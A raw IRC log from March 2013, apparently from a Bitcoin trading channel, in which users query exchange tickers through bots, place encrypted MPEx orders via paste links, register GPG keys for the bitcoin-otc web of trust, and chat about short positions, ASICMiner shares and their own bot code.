23:24:20 one year ago this would have been two degrees of magnitude larger if not more. Mar 09 23:24:21 Mircea, are the orders formatted the same in!mp Mar 09 23:24:37 jborkl the same aswhat ? Mar 09 23:24:58 !mp Mar 09 23:24:59 Please use http://dpaste.com/ Mar 09 23:25:10 BUY|S.DICE... Mar 09 23:25:16 yup Mar 09 23:25:22 Ok thanks Mar 09 23:25:26 you makr you order, you sign it, then you encrypt it, then you paste that Mar 09 23:25:29 then you feed the bots Mar 09 23:25:48 mircea_popescu ? Mar 09 23:25:54 !ticker m O.BTCUSD.C610N Mar 09 23:25:55 How can I be of assistance, my poor man? Mar 09 23:25:58 !ticker m C610N Mar 09 23:25:59 Aren't those tins of tobacco right there behind you? Mar 09 23:25:59 hm Mar 09 23:26:10 ghe doesn't find that one cause it hasn't traded Mar 09 23:26:22 but since p750n is sufficient identification Mar 09 23:26:25 why doesn't he find it ? Mar 09 23:26:32 !ticker m P750T Mar 09 23:26:33 Quest for vision is a great blessing. Mar 09 23:26:41 !ticker m O.BTCUSD.P750T Mar 09 23:26:42 the key is O.BTCUSD.C610N Mar 09 23:26:42 [MPEX:O.BTCUSD.P750T] 1D: 0.89918038 / 0.90051586 / 0.90144085 (2375 shares, 2,138.73 BTC), 7D: 0.85433966 / 0.9786482 / 1.12260046 (23750 shares, 23,242.89 BTC), 30D: 0.85433966 / 1.06533167 / 1.53153505 (28750 shares, 30,628.29 BTC) Mar 09 23:26:49 in the depth Mar 09 23:27:30 basically, it should take the provided string, see how many of the available mpsics regex-match it Mar 09 23:27:40 if 1 then report on that. if 0 or >1 then say sorry. Mar 09 23:29:49 and since we're talking about this, would it be possible to have a !depth Mar 09 23:30:04 which reports say 6 or 8 items either side from midmarket ? Mar 09 23:30:12 like : !depth blabla Mar 09 23:30:37 10x.5 100x.4 13x.22 .21 x 19 .20x150 Mar 09 23:30:38 etc Mar 09 23:30:45 with a | down te middle. Mar 09 23:31:55 !ticker Mar 09 23:31:55 Shit. You ain't even old enough to smoke. Mar 09 23:32:09 $sdice Mar 09 23:32:18 !mp http://dpaste.com/1017589/ Mar 09 23:32:18 Processing. Mar 09 23:32:20 Response: http://dpaste.com/1017591/plain/ Mar 09 23:32:39 Dammit Mar 09 23:32:43 jborkl Mar 09 23:32:49 mind doing one pass not off the phone ? Mar 09 23:32:58 to make sure your process works ? Mar 09 23:33:09 otherwise if you're trying to implement somethingthat doesn't work you'll kill yourself Mar 09 23:33:15 it works Mar 09 23:33:25 a ok nm then Mar 09 23:33:40 !help Mar 09 23:33:40 List of commands: Mar 09 23:33:41 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 23:33:42 !mp (desc: returns the response from MPEX order) Mar 09 23:34:16 is gribble here? Mar 09 23:35:28 Let me try it off normal desktop Mar 09 23:36:32 !ticker m P750T Mar 09 23:36:33 [MPEX:O.BTCUSD.P750T] 1D: 0.89918038 / 0.90051586 / 0.90144085 (2375 shares, 2,138.73 BTC), 7D: 0.85433966 / 0.9786482 / 1.12260046 (23750 shares, 23,242.89 BTC), 30D: 0.85433966 / 1.06533167 / 1.53153505 (28750 shares, 30,628.29 BTC) Mar 09 23:36:58 if($ticker[0] == "P" || $ticker[0] == "C" ){ Mar 09 23:36:58 $ticker = "O.BTCUSD.".$ticker; Mar 09 23:36:58 } Mar 09 23:36:59 :p Mar 09 23:37:55 !ticker s.dice Mar 09 23:37:56 Shit. You ain't even old enough to smoke. Mar 09 23:38:11 !ticker m s.dice Mar 09 23:38:12 [MPEX:S.DICE] 1D: 0.00549999 / 0.00550022 / 0.005884 (1651 shares, 9.08 BTC), 7D: 0.00300001 / 0.00548202 / 0.006225 (503030 shares, 2,757.62 BTC), 30D: 0.00300001 / 0.0061622 / 0.0069 (3739840 shares, 23,045.67 BTC) Mar 09 23:38:25 aha Mar 09 23:49:53 apparently being bitcoin pr is the new hype thing Mar 09 23:50:49 ;;ticker Mar 09 23:50:50 got hit with "the bitcoin catalog", "the bitcoin documentary" and "bitcoin pr buzz" in like one day Mar 09 23:50:50 BTCUSD ticker | Best bid: 46.47999, Best ask: 46.54400, Bid-ask spread: 0.06401, Last trade: 46.54400, 24 hour volume: 44070.26922702, 24 hour low: 43.41100, 24 hour high: 46.99000, 24 hour vwap: 45.27764 Mar 09 23:51:13 also the bitcoin hedge fund Mar 09 23:51:19 ;;bc,24hprc Mar 09 23:51:21 in Malta Mar 09 23:51:21 45.12 Mar 09 23:51:40 Yay for the OIX Mar 09 23:51:42 [BTCTC] [S.DICE-PT] 1 @ 0.00568 BTC [+] Mar 09 23:51:50 yeah but that doesnt have much in common with being a bitcoin PR Mar 09 23:52:02 http://thebitcoincatalog.com/ Mar 09 23:52:05 http://bitcoinprbuzz.com/ Mar 09 23:52:11 Public relations? Mar 09 23:52:28 http://bitcointhedocumentary.org/wordpress/ Mar 09 23:53:00 heh Mar 09 23:55:38 you know http://bitcoinprbuzz.com/ is actually pretty reasonably priced Mar 09 23:55:49 4.5 bitcoins? Mar 09 23:55:57 at most Mar 09 23:56:35 Our services involve writing a professional Press Release for you and submitting it to anywhere from over 1000 to 30 000 + USA based media organisations Mar 09 23:56:42 that doesn't mean anything to me. Mar 09 23:59:43 ianbakewell is still not here Mar 10 00:00:06 this is looking more like a 600 BTC heist Mar 10 00:00:15 and 30,000 dice share heist Mar 10 00:00:23 yeah, they aren't doing anything that you or I couldn't do ourselves Mar 10 00:00:40 but they are using their time to do those stupid tasks Mar 10 00:00:53 MJR_ i dunno what the use is tho Mar 10 00:00:57 basically... more spam Mar 10 00:01:08 maybe. SEO Mar 10 00:01:14 heh. Mar 10 00:01:18 Attract new customers Mar 10 00:01:30 Bowjob sucks. Mar 10 00:02:00 Bowjob urlpls? Mar 10 00:02:14 mostly have your article reposted with a Forbes.com or CNN.com domain attached Mar 10 00:03:36 ok guys I am switching to my real name Mar 10 00:05:03 lol Mar 10 00:05:09 this is weird Mar 10 00:05:43 my first name is reall Maximo Mar 10 00:06:06 Bowjob link? Mar 10 00:06:59 umm Mar 10 00:07:00 https://bitcointalk.org/index.php?action=profile;u=63614 Mar 10 00:07:06 Hasn't been online since the 4th Mar 10 00:07:14 he was due for march 8th for his first payment Mar 10 00:07:20 tho in fairness, isn't he working in like shipping ? Mar 10 00:07:23 or oil or something ? Mar 10 00:07:29 like, away for weeks ? Mar 10 00:07:35 mhm, not sure Mar 10 00:07:39 if he works in oil.. Mar 10 00:07:44 there should be some internet at least Mar 10 00:08:02 depends. Mar 10 00:08:03 heh, not on the rigs Mar 10 00:08:05 he works in alberta,.. yah its like 34 dollars per hour there Mar 10 00:08:17 mcdonalds people make $14 per hour Mar 10 00:08:27 but rent there is very exp Mar 10 00:08:34 ill stay in vancouver lol Mar 10 00:08:54 also, again he's late in his first payment thats defaulting right there Mar 10 00:08:59 good luck :) Mar 10 00:09:14 "Short BTC600 @ $34.50" Mar 10 00:09:17 Says on his profile Mar 10 00:09:20 yep Mar 10 00:09:28 bad move imo Mar 10 00:09:35 you do not short BTC Mar 10 00:09:36 lol Mar 10 00:09:37 $6000 down or so? Mar 10 00:10:03 le ouch Mar 10 00:10:04 yah Mar 10 00:10:15 oh and thats just principal Mar 10 00:10:19 he is up on his sdice though Mar 10 00:10:20 theres interest too Mar 10 00:10:30 dude his dice short isnt much to cover for it Mar 10 00:10:35 yeah Mar 10 00:10:40 just saying Mar 10 00:10:48 if anyone is interested in an MPEx client that supports its IRC bots: https://github.com/fawuxi/mpex Mar 10 00:10:54 still a little rough, but works for me Mar 10 00:11:05 around march 22 we should see something interesting Mar 10 00:11:05 https://bitcointalk.org/index.php?topic=140472.msg1589556#msg1589556 Mar 10 00:11:13 seems cablepair was well known scammer ?! is this factual ? Mar 10 00:11:17 thats where coinlab starts playing Mar 10 00:11:26 Bowjob where he shiorted at ? 60 ? Mar 10 00:11:34 0.62 Mar 10 00:11:37 do you calculate based on last or on bid? Mar 10 00:11:38 o wow FabianB_ ! Mar 10 00:11:44 ppl please test his bot. Mar 10 00:12:28 cuz at one point it was at 35 Mar 10 00:12:57 well, if he closed at 35 then he's golden Mar 10 00:13:03 yes Mar 10 00:13:04 didn't try it on non-unix systems yet, hope it works there too though Mar 10 00:13:04 if not, he's up Mar 10 00:13:11 like 3-4 btc Mar 10 00:14:21 !calc 40,000 * .0012 Mar 10 00:15:02 ;;calc 40,000 * .0012 Mar 10 00:15:03 Error: Something in there wasn't a valid number. Mar 10 00:15:06 ;;calc 40000 * .0012 Mar 10 00:15:07 48.0 Mar 10 00:15:36 course mkt depth shows lowest ask at 58.8 Mar 10 00:15:38 up 48 btc if its at .005 Mar 10 00:15:39 that'd be 3.2 not 12 Mar 10 00:15:47 oh nice Mar 10 00:15:57 for me that is Mar 10 00:16:04 and cause of slippage buying 40k takes avg price more to like 59.5 Mar 10 00:16:32 ooh, when does he have to settle his position? Mar 10 00:16:40 may 1st Mar 10 00:16:44 i think Mar 10 00:16:50 that may be painful. Mar 10 00:16:55 with asicminer blowing over... Mar 10 00:17:05 May 17 2013. Mar 10 00:17:07 there Mar 10 00:18:59 I weep for Basic victims Mar 10 00:19:16 but I laugh at BFL victims.. I seem to be irrational Mar 10 00:19:18 >_> Mar 10 00:19:30 Stockholm syndrome is hilarious Mar 10 00:21:07 hehehe Mar 10 00:21:47 who lent him the shares to short? Mar 10 00:22:13 it was tradefortress for 7k, and some random dude at 30k Mar 10 00:22:43 and TF runs a 'fund' Mar 10 00:22:48 prolly shares from there? Mar 10 00:23:07 prolly. Mar 10 00:23:13 Bowjob https://bitcointalk.org/index.php?topic=151265.0 Mar 10 00:23:15 it does look sad. Mar 10 00:24:26 i just skimmed thru it, asic miner, popped? Mar 10 00:24:41 financials don't look too good Mar 10 00:24:46 and they blew their ipo Mar 10 00:24:46 oh i see Mar 10 00:25:15 im watching max keiser.. show. he seems like a nutjob over btc Mar 10 00:25:28 i mean i want btc to go as much as the next person, but he seems shady Mar 10 00:25:29 lol Mar 10 00:25:40 he mentioned before, but now he met everwhores Mar 10 00:25:44 and he is hyped Mar 10 00:25:47 ahahahaaaa Mar 10 00:25:52 omfg that is totally it. Mar 10 00:25:57 is he for real lol Mar 10 00:26:11 for srs Mar 10 00:26:24 https://bitcointalk.org/index.php?topic=151182.0 Mar 10 00:27:22 lol Mar 10 00:27:32 i dunno. max seems like a used car salesman Mar 10 00:27:45 and a snake oil peddler Mar 10 00:27:53 hes fucked up on btc Mar 10 00:27:58 yes Mar 10 00:28:10 I said earlier that he sounds like he's on meth Mar 10 00:28:32 bitcoin jesus? i'll just go back in my hole Mar 10 00:28:32 also, he loves btc, but I don't think he knows a lot about them Mar 10 00:28:56 smickles how many geebuses have we had so far? Mar 10 00:29:28 I really don't keep track Mar 10 00:29:46 i tell my friends every now and then about bitcoin.. but i dont say i'll be rich over it Mar 10 00:29:56 once, at a beer pong table, I was called jesus. I forgave them. Mar 10 00:30:14 you do look kinda jesusy Mar 10 00:30:27 'specially with my hair down Mar 10 00:39:32 lol my whole office asks me every day Mar 10 00:39:47 so where are they at today? Mar 10 00:39:58 hehe Mar 10 00:40:00 a coworker wanted to short them Mar 10 00:40:37 ouch Mar 10 00:40:42 how much are asicminer shares now Mar 10 00:41:08 so at first he told me that we should just say that i would owe him a dollar for every dollar it goes down and he would owe me a dollar for every dollar it goes up Mar 10 00:41:09 !ticker btct asicminer-pt Mar 10 00:41:11 [BTCT:ASICMINER-PT] 1D: 0.679 / 0.90177 / 1 (166 shares, 149.7 BTC), 7D: 0.65 / 0.68589 / 1 (1170 shares, 802.5 BTC), 30D: 0.65 / 0.68589 / 1 (1170 shares, 802.5 BTC) Mar 10 00:41:22 lol Mar 10 00:41:40 0.6 per share??? Mar 10 00:41:43 I was too nice and told him I didn't want him writing naked calls Mar 10 00:41:47 0.6 was the low Mar 10 00:41:59 so almost 1 btc [er share Mar 10 00:42:02 [HAVELOCK] [SDICE] 1 @ 0.57 BTC [+] Mar 10 00:42:02 isnt that kinda too high Mar 10 00:42:03 lol Mar 10 00:42:04 0.9 avg Mar 10 00:42:25 like I know my risk it's $45 Mar 10 00:42:35 you could be on the hook for millions Mar 10 00:42:54 mjr_ why not just use the mpex options i don't get it ?! Mar 10 00:43:07 he doesn't have any bitcoins Mar 10 00:43:19 and I already use the mpex options Mar 10 00:43:40 this month Mar 10 00:44:09 that was before it had hit 32 I think but I don't remember Mar 10 00:44:25 lol Mar 10 00:44:33 so if he doesn't have btc, why are we talking to huim lol Mar 10 00:44:37 OIX :) Mar 10 00:44:49 like I said he's my coworker Mar 10 00:45:15 o you two work together ? Mar 10 00:45:19 yep Mar 10 00:45:24 o nm nm Mar 10 00:45:32 i was thinking we're still discussing bakewell Mar 10 00:45:39 my bad Mar 10 00:45:43 nah all good Mar 10 00:46:21 ok so I registered Mar 10 00:46:35 now I want to set up the pgp signature Mar 10 00:46:36 http://blockchain.info/charts/market-price?timespan=180days&showDataPoints=false&daysAverageString=1&show_header=true&scale=0&address= Mar 10 00:47:22 the heck Mar 10 00:47:56 Namworld Bowjob they had a db issue Mar 10 00:47:57 BTC was worth 45 USD all that time, just no one knew about it... Mar 10 00:48:01 lost some data it seems Mar 10 00:48:12 I prefer my explanation Mar 10 00:48:22 lolk Mar 10 00:49:51 !mp http://dpaste.com/1017659/ Mar 10 00:49:51 Processing. Mar 10 00:49:53 Response: http://dpaste.com/1017661/plain/ Mar 10 00:50:16 jborkl_ paste an address Mar 10 00:50:26 this is getting painful to watch Mar 10 00:51:21 !mp http://dpaste.com/1017669/ Mar 10 00:51:21 Processing. Mar 10 00:51:23 Response: http://dpaste.com/1017670/plain/ Mar 10 00:52:02 [HAVELOCK] [SDICE] 1 @ 0.58999999 BTC [+] Mar 10 00:52:11 quite a nice recovery Mar 10 00:52:12 on dice Mar 10 00:53:25 i like how this channel jumped to like 130 users lately. Mar 10 00:53:44 moar spam Mar 10 00:54:12 well accually is not bad. Mar 10 00:54:19 seen it worse Mar 10 00:54:47 what's in the !mp output - a dump of the current order book? Mar 10 00:56:52 !help Mar 10 00:56:52 List of commands: Mar 10 00:56:53 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 00:56:54 !mp (desc: returns the response from MPEX order) Mar 10 00:58:02 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [+] Mar 10 00:59:29 "returns the response from MPEX order" - means that i can place orders via dpaste (given encryption etc)? Mar 10 00:59:38 ya Mar 10 00:59:57 benkay exactly. Mar 10 01:00:02 thank you. Mar 10 01:00:13 if you want a dump of the book do Mar 10 01:00:15 $mdepth Mar 10 01:00:26 if you want a dump of the vwap do Mar 10 01:00:27 $vwap Mar 10 01:00:30 mircea_popescu: http://pastebin.com/F8TXg0DP Mar 10 01:00:34 wtf, i got them mixed ? Mar 10 01:00:38 $help Mar 10 01:00:38 mircea_popescu: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Mar 10 01:00:42 $help mdepth Mar 10 01:00:42 mircea_popescu: Error: There is no command "mdepth". Mar 10 01:00:45 hm Mar 10 01:00:46 its w/o m Mar 10 01:00:49 o ty Mar 10 01:00:55 $depth Mar 10 01:00:57 mircea_popescu: http://pastebin.com/k55tiUtd Mar 10 01:01:10 and if you want details of individual symbols in easier format here, benkay Mar 10 01:01:12 you do Mar 10 01:01:16 !ticker m s.dice Mar 10 01:01:17 [MPEX:S.DICE] 1D: 0.00549999 / 0.00549999 / 0.0055 (1650 shares, 9.07 BTC), 7D: 0.00300001 / 0.00548202 / 0.006225 (503030 shares, 2,757.62 BTC), 30D: 0.00300001 / 0.00616219 / 0.0069 (3738644 shares, 23,038.26 BTC) Mar 10 01:02:46 ;;gpg eregister JoshRossi C286BB96FE9B6CD3 Mar 10 01:02:50 Request successful for user JoshRossi, hostmask mjr_!~mjr@cpe-68-174-114-54.nyc.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/C286BB96FE9B6CD3 Mar 10 01:03:42 nice Mar 10 01:04:05 so now I'm part of the web of trust? Mar 10 01:04:36 m0mchil makomk malaimo Mandrius maximian midnightmagic MiningBuddy mircea_popescu miscreanity mjr_ mod6 molec molecular mpexbot Mar 10 01:04:37 ;;gettrust mjr_ Mar 10 01:04:38 Trust relationship from user mircea_popescu to user mjr_: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=mjr_ Mar 10 01:04:43 not for me :D Mar 10 01:04:49 lol Mar 10 01:05:06 I meant ability to be trusted not trusted yet Mar 10 01:05:14 ;;ident joshrossi Mar 10 01:05:15 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 10 01:05:22 ;;gpg info joshrossi Mar 10 01:05:22 No such user registered. Mar 10 01:05:26 npe. Mar 10 01:05:39 ;;gpg info JoshRossi Mar 10 01:05:40 No such user registered. Mar 10 01:05:52 ;;eauth JoshRossi Mar 10 01:05:53 Error: This nick is not registered. Please register. Mar 10 01:06:06 ok... Mar 10 01:06:12 you need to handle the opt first. Mar 10 01:06:19 i guess Mar 10 01:07:27 btw FabianB_ do you read chinese ? Mar 10 01:07:52 mircea_popescu: not really, just speak very little Mar 10 01:07:55 a ok Mar 10 01:07:56 so is ian bakewell a scam or not Mar 10 01:08:02 Bowjob give it a week or two. Mar 10 01:08:06 ;;eightball ian Mar 10 01:08:06 It is possible. Mar 10 01:08:10 ahahaha Mar 10 01:08:15 ;;cookie gribble Mar 10 01:08:16 Error: "cookie" is not a valid command. Mar 10 01:08:19 lol Mar 10 01:08:22 hehe Mar 10 01:08:28 the bot Mar 10 01:08:29 lol Mar 10 01:09:23 So - I'm not sure if I'm being too forward by asking this - is there a way to invest in asicminer? Mar 10 01:09:26 mircea_popescu: chinese traders asking you and the faq translater where mpex went? Mar 10 01:09:32 (and to see what kind of activity is happening?) Mar 10 01:10:00 FabianB_ no, just wanted to see about how sucky the chiense version is Mar 10 01:10:12 jMyles you're never too forward by asking. Mar 10 01:10:20 there's a btct passthrough and a bitfunder passthrough. Mar 10 01:10:28 their contractual basis is maybe shaky, do your dd Mar 10 01:10:37 to see activity, Mar 10 01:10:41 !ticker btct asicminer-pt Mar 10 01:10:43 [BTCT:ASICMINER-PT] 1D: 0.69 / 0.90312 / 1 (165 shares, 149 BTC), 7D: 0.65 / 0.68589 / 1 (1170 shares, 802.5 BTC), 30D: 0.65 / 0.68589 / 1 (1170 shares, 802.5 BTC) Mar 10 01:10:52 mircea_popescu: but it looks like the passthroughs have only paid two dividends? Mar 10 01:10:52 ukto has yet STILL NOT ADDED BF Mar 10 01:10:57 jarpiain jborkl_ jcpham JimmyHo3 jMyles jurov JWU42 Mar 10 01:10:57 jarpiain jborkl_ jcpham JimmyHo3 jMyles jurov JWU42 Mar 10 01:11:04 jMyles i really haven't been keeping tabs so i dunno Mar 10 01:11:58 me add what? Mar 10 01:12:01 to the bot? Mar 10 01:12:03 your feed! yes! Mar 10 01:12:05 http://i.imgur.com/MSEOcWe.png Mar 10 01:12:08 i have websocket Mar 10 01:12:14 we've been oddly stable for a while now Mar 10 01:12:17 assbot doesnt support it Mar 10 01:12:24 the bids look weak however Mar 10 01:12:31 Bowjob looks like mpoe lol Mar 10 01:12:45 lol Mar 10 01:12:50 Ukto can't you just make a json somewhere ? Mar 10 01:12:57 at least !ticker will work then Mar 10 01:12:59 ;;everify freenode:#bitcoin-otc:2c057cc8dff074ee13a20df82b057767f81844e56105610c250b4618 Mar 10 01:13:00 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Mar 10 01:13:05 this is calm before the storm. come monday theres gonna be a shitstorm Mar 10 01:13:14 ya but prolly on the upside. Mar 10 01:13:23 mircea_popescu: yeah, but its being changed due to request Mar 10 01:13:26 and its low priority Mar 10 01:13:32 whereas websocket is ready Mar 10 01:13:36 besides Mar 10 01:13:42 i am debating not doing get/post anymore Mar 10 01:13:46 and leaving it purely to websocket Mar 10 01:13:51 to keep load off the server Mar 10 01:13:56 we're going to end up with a third party interpreter here ? Mar 10 01:14:30 get/post is so archaic Mar 10 01:14:41 websockets are far far superior. lets get with the times :) Mar 10 01:15:02 whatever way you do it, it pisses me off when i can't ticker. Mar 10 01:15:09 getting there! Mar 10 01:15:09 (15:00) < BitOTTer755> $vwap Mar 10 01:16:02 ident JoshRossi Mar 10 01:16:17 lol cool mod6 Mar 10 01:16:18 ;;ident JoshRossi Mar 10 01:16:18 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 10 01:16:27 also! mod6 : look at FabianB_ commit Mar 10 01:16:35 https://github.com/fawuxi Mar 10 01:16:35 ident mjr_ Mar 10 01:16:44 might have stuff there you need for your own botcode Mar 10 01:16:50 ;;ident mjr_ Mar 10 01:16:50 Nick 'mjr_', with hostmask 'mjr_!~mjr@cpe-68-174-114-54.nyc.res.rr.com', is not identified. Mar 10 01:18:15 !help Mar 10 01:18:15 List of commands: Mar 10 01:18:15 it's still pretty ugly and needs refactoring, but it's there and it works Mar 10 01:18:16 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 01:18:17 !mp (desc: returns the response from MPEX order) Mar 10 01:19:50 thx mircea_popescu, his is Ruby but might come in handy... Mar 10 01:20:17 o wow, ruby ? Mar 10 01:20:27 FabianB_ aren;'t you concerned by the numerous breaches lately ? Mar 10 01:20:44 mircea_popescu: not at all, all those braches are Rails related Mar 10 01:20:57 ah, this is not ror just ruby ? Mar 10 01:21:04 jup Mar 10 01:21:08 never liked ror Mar 10 01:21:12 ror is not ruby Mar 10 01:21:25 kk Mar 10 01:21:25 never liked ruby Mar 10 01:21:30 ; Mar 10 01:21:33 ;) Mar 10 01:21:36 and of course a commandline client doesn't need any web stuff Mar 10 01:22:17 FabianB_ the concern is that some unwittign user may be running a web server on his home computer w/o knowing Mar 10 01:22:23 this is common for windows users for instance Mar 10 01:22:30 then he could end up raped unexpectedly. Mar 10 01:22:42 rape is rarely expected Mar 10 01:22:48 exactly :D Mar 10 01:23:01 [HAVELOCK] [SDICE] 2 @ 0.595 = 1.19 BTC [+] Mar 10 01:23:31 mircea_popescu: not through my code, only if my code (or a library i use) is itself insecure or if that user is integrating it into his lame ror Mar 10 01:23:45 kay. Mar 10 01:23:59 i would expect at least one rorbro to do something like that Mar 10 01:24:21 benkay at least it's been publicly mentioned, it's known about etc. Mar 10 01:25:44 ok now i can try to get this WOT thing working Mar 10 01:26:02 mircea_popescu: actually it started as a more featureful alternative to pympex for me; used it for a while Mar 10 01:26:09 cool Mar 10 01:26:15 i just added the IRC stuff today Mar 10 01:29:50 !help Mar 10 01:29:50 List of commands: Mar 10 01:29:51 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 01:29:52 !mp (desc: returns the response from MPEX order) Mar 10 01:35:16 what's the latest on mpex? Mar 10 01:35:36 DDoS Mar 10 01:35:53 ;;gpg eregister Josh_Rossi C286BB96FE9B6CD3 Mar 10 01:35:54 Request successful for user Josh_Rossi, hostmask Josh_Rossi!~mjr@cpe-68-174-114-54.nyc.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/C286BB96FE9B6CD3 Mar 10 01:35:56 aethero https://bitcointalk.org/index.php?topic=138956.msg1605252#msg1605252 is a good point to staert Mar 10 01:36:42 Expected ETA for the site itself? Mar 10 01:36:46 Going strictly onion? Mar 10 01:38:54 ;;ident Josh_Rossi Mar 10 01:38:54 Nick 'Josh_Rossi', with hostmask 'Josh_Rossi!~mjr@cpe-68-174-114-54.nyc.res.rr.com', is identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 01:39:05 aethero there are bots trading here. there will be an onion up, but im not sure tor can take the load. Mar 10 01:39:18 there is a 10gb dedicated connection with muchly beefed up setups coming online asap. Mar 10 01:39:24 ever going on clearweb again Mar 10 01:39:34 there have been problems with supplying the hardware and so forth. I think next week is a safe estimate Mar 10 01:40:38 nice...arista? Mar 10 01:40:51 nope. Mar 10 01:41:04 we got one arista 10gb Mar 10 01:41:21 and i also got to play with a force10 Mar 10 01:41:51 aethero anyway, proving that mpex can work w/o website is an important point here. Mar 10 01:41:56 i want that to sink in well. Mar 10 01:44:01 [HAVELOCK] [HIM] 3 @ 1.7 = 5.1 BTC [+] Mar 10 01:45:56 [MPEX] [O.BTCUSD.C470T] 720 @ 0.18196843 = 131.0173 BTC [+] Mar 10 01:52:45 ;;gettrust Josh_Rossi Mar 10 01:52:45 Trust relationship from user Josh_Rossi to user Josh_Rossi: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=Josh_Rossi&dest=Josh_Rossi Mar 10 01:53:04 ;;gettrust mircea_popescu Mar 10 01:53:04 Trust relationship from user Josh_Rossi to user mircea_popescu: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=Josh_Rossi&dest=mircea_popescu Mar 10 01:53:22 well looks like i got it working Mar 10 01:53:37 but i would like to add an address to it Mar 10 01:53:40 ;;ident Josh_Rossi Mar 10 01:53:40 Nick 'Josh_Rossi', with hostmask 'Josh_Rossi!~mjr@cpe-68-174-114-54.nyc.res.rr.com', is identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 01:55:01 ;;rate mircea_popescu +3 Mar 10 01:55:02 Error: You have to have received some ratings in order to rate other users. Mar 10 01:55:11 ah ok Mar 10 01:55:49 ;;eauth Josh_Rossi Mar 10 01:55:50 Request successful for user Josh_Rossi, hostmask mjr_!~mjr@cpe-68-174-114-54.nyc.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/C286BB96FE9B6CD3 Mar 10 01:57:36 ;;getinfo Josh_Rossi Mar 10 01:57:36 Error: "getinfo" is not a valid command. Mar 10 01:58:37 .authenticate Mar 10 01:59:55 ;;eauth mircea_popescu Mar 10 01:59:56 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 10 02:01:51 ;;everify freenode:#bitcoin-otc:3f37b219dbeef705e0d0715acbc922c60d94b6b639c29a17c94779ac Mar 10 02:01:52 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 10 02:02:17 ;;rate Josh_Rossi 1 He's a noob. Mar 10 02:02:18 Rating entry successful. Your rating of 1 for user Josh_Rossi has been recorded. Mar 10 02:02:59 [BTCTC] [ASICMINER-PT] 1 @ 0.7752 BTC [-] Mar 10 02:07:31 ;;ident Josh_Rossi Mar 10 02:07:31 Nick 'Josh_Rossi', with hostmask 'Josh_Rossi!~mjr@cpe-68-174-114-54.nyc.res.rr.com', is not identified. Mar 10 02:18:02 [HAVELOCK] [HIM] 5 @ 1.7 = 8.5 BTC [+] Mar 10 02:21:10 [BTCTC] [BTC-GOLD] 1 @ 0.01001 BTC [-] Mar 10 02:21:12 [BTCTC] [BTC-GOLD] 9 @ 0.01 = 0.09 BTC [-] Mar 10 02:21:55 ok this is getting a bit better... (16:21) <@mod6> http://pastebin.com/C1dT6RrM Mar 10 02:21:58 (16:21) < BitOTTer569> PasteBin Key: C1dT6RrM Mar 10 02:22:10 haha is that your little ircbot ? Mar 10 02:22:34 yeah. the old Net::IRC is like uber deprecated Mar 10 02:22:39 supy ? Mar 10 02:22:55 or no cause you were doing perl neh ? Mar 10 02:23:20 just changing these scripts to be able to connect to IRC and issue a command, get a response, parse it, then grab the URL or Key parsed, grab the raw data from the paste, and then display. Mar 10 02:23:32 ya but what bot is it ? bitch ? Mar 10 02:23:41 haha, i rolled my own Mar 10 02:23:50 nice mod6 Mar 10 02:23:52 o all the wya ?! Mar 10 02:23:54 wow. well done. Mar 10 02:24:00 I am trying to set this up now Mar 10 02:24:04 well, with this lib: POE::Component::IRC Mar 10 02:24:22 ;;ident Mar 10 02:24:22 You are not identified. Mar 10 02:24:34 ;;eauth Mar 10 02:24:35 so that has all of the commands and some subroutines to help with connect and sessions, etc. Mar 10 02:24:35 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Mar 10 02:24:49 someone should totally make a lispbot implementation. Mar 10 02:25:00 thx mircea_popescu, ima keep working on it for the next few days. hopefully get it to a spot that's pretty functional. Mar 10 02:25:12 ahh lisp Mar 10 02:25:16 even seen scheme? Mar 10 02:25:21 mod6 isn't it funny that as you make progress mpex also adds shit ? Mar 10 02:25:24 yea Mar 10 02:26:04 yeah its good though Mar 10 02:26:08 :D Mar 10 02:26:10 hehe Mar 10 02:26:18 ima keep going here. thx guys. Mar 10 02:27:53 awesome Mar 10 02:27:58 this is starting to work Mar 10 02:30:12 ;;ident Mar 10 02:30:12 You are not identified. Mar 10 02:30:56 !ticker m s.bbet Mar 10 02:30:57 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0015 / 0.00174357 / 0.00197 (80200 shares, 139.83 BTC), 30D: 0.0015 / 0.00178893 / 0.00197 (111808 shares, 200.02 BTC) Mar 10 02:31:15 !ticker m s.dice Mar 10 02:31:17 [MPEX:S.DICE] 1D: 0.00549999 / 0.00549999 / 0.0055 (1650 shares, 9.07 BTC), 7D: 0.00300001 